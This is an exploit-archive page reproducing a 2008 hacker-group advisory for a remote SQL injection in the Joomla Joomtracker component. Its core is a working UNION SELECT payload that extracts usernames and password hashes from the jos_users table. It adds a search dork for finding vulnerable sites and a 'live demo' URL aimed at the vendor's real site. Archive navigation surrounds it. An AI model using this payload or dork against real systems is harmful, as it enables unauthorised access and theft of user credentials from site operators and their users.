joomlajoomtracker-sql.txt

joomlajoomtracker-sql.txt: Posted Oct 9, 2008; Authored by rsauron | Site darkc0de.com; The Joomla Joomtracker component version 1.01 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 27be85e82e6efd840b9a0cce5413370a21301c73c681dedf602834a276d92912; Download | Favorite | View

joomlajoomtracker-sql.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
#  d3hydr8 - rsauron - baltazar - C1c4Tr1Z - beenu - P47tr1ck  # 
#                  and all darkc0de  members                   # 
################################################################ 
# 
# Author: rsauron 
# 
# Home  : www.darkc0de.com
# 
# Email : rsauron@gmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Type: Joomla Component com_joomtracker Remote SQL Injection Vulnerability
#
# Title: Joomtracker XBT external bittorrent tracker
#
# Vendor: http://www.joomtracker.org/
# 
################################################################ 
#
# d0rk: "Powered by Joomtracker"
#
################################################################  
     POC :- 
  
  index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/*       
   
     Live Demo: 
  
  http://www.joomtracker.org/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/*
  
################################################################ 
#  Bug discovered : 08 Oct.2008
################################################################

Top Authors In Last 30 Days

Red Hat 136 files
Ubuntu 97 files
Debian 24 files
LiquidWorm 10 files
Google Security Research 10 files
Muhammad Navaid Zafar Ansari 7 files
Abdulhakim Oner 6 files
fearzzzz 5 files
nu11secur1ty 5 files
Ivan Fratric 5 files

File Archives

Systems

AIX (426)
Apple (1,951)
BSD (370)
CentOS (55)
Cisco (1,919)
Debian (6,710)
Fedora (1,691)
FreeBSD (1,242)
Gentoo (4,288)
HPUX (878)
iOS (338)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,054)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,874)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,426)
UNIX (9,205)
UnixWare (185)
Windows (6,530)
Other

joomlajoomtracker-sql.txt

joomlajoomtracker-sql.txt

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

joomlajoomtracker-sql.txt

Share This

joomlajoomtracker-sql.txt

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems